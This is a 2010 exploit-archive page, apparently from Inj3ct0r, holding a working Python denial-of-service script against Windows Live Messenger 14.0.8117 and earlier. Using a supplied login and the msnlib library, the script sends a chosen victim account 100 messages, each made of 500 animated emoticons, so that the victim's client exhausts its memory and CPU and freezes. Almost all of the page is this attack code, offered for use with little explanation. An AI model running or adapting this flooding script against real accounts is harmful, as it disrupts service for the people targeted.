Windows Live Messenger <= 14.0.8117 Animation Remote Deni
Posted on 11 August 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Windows Live Messenger <= 14.0.8117 Animation Remote Denial of Service</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>====================================================================== Windows Live Messenger <= 14.0.8117 Animation Remote Denial of Service ====================================================================== # Exploit Title: Windows Live Messenger <= 14.0.8117 animation remote Denial of Service # Date: 11/08/2010 # Author: TheLeader # Email: gsog2009 [a7] hotmail [d0t] com # Software Link: http://explore.live.com/windows-live-messenger # Version: 14.0.8117 and prior # Tested on: Windows 7 x86 # msnlib required: http://blitiri.com.ar/p/msnlib/ # Greets: forums.hacking.org.il - <3UGUYS # SP. thx goes to Alberto <albertito [a7] blitiri [d0t] com [d0t] ar> for # the msnlib library / Original msnbot example (that I modded =] ) # Description: # Windows Live Messenger is prone to a Denial of Service attack. By sending # specially crafted messages that contain a large number of animations ("Smileys"), # it is possible to make WLM consume large amounts of memory and CPU while # it attempts to render the animated images, causing it to stop responding. import sys import time import select import socket import thread import msnlib import msncb payload = ":'(" * 500 m = msnlib.msnd() m.cb = msncb.cb() def do_work(): time.sleep(15) for i in range(100): print m.sendmsg(victim, payload) time.sleep(30) quit() try: m.email = sys.argv[1] m.pwd = sys.argv[2] victim = sys.argv[3] except: print "Usage: msnkeep.py account password victim_account" sys.exit(1) m.login() m.sync() m.change_status("online") def quit(): try: m.disconnect() except: pass sys.exit(0) thread.start_new_thread(do_work, ()) while 1: t = m.pollable() infd = t[0] outfd = t[1] try: fds = select.select(infd, outfd, [], 0) except: quit() for i in fds[0] + fds[1]: try: m.read(i) except ('SocketError', socket.error), err: if i != m: m.close(i) else: quit() time.sleep(0.01) # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-11]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
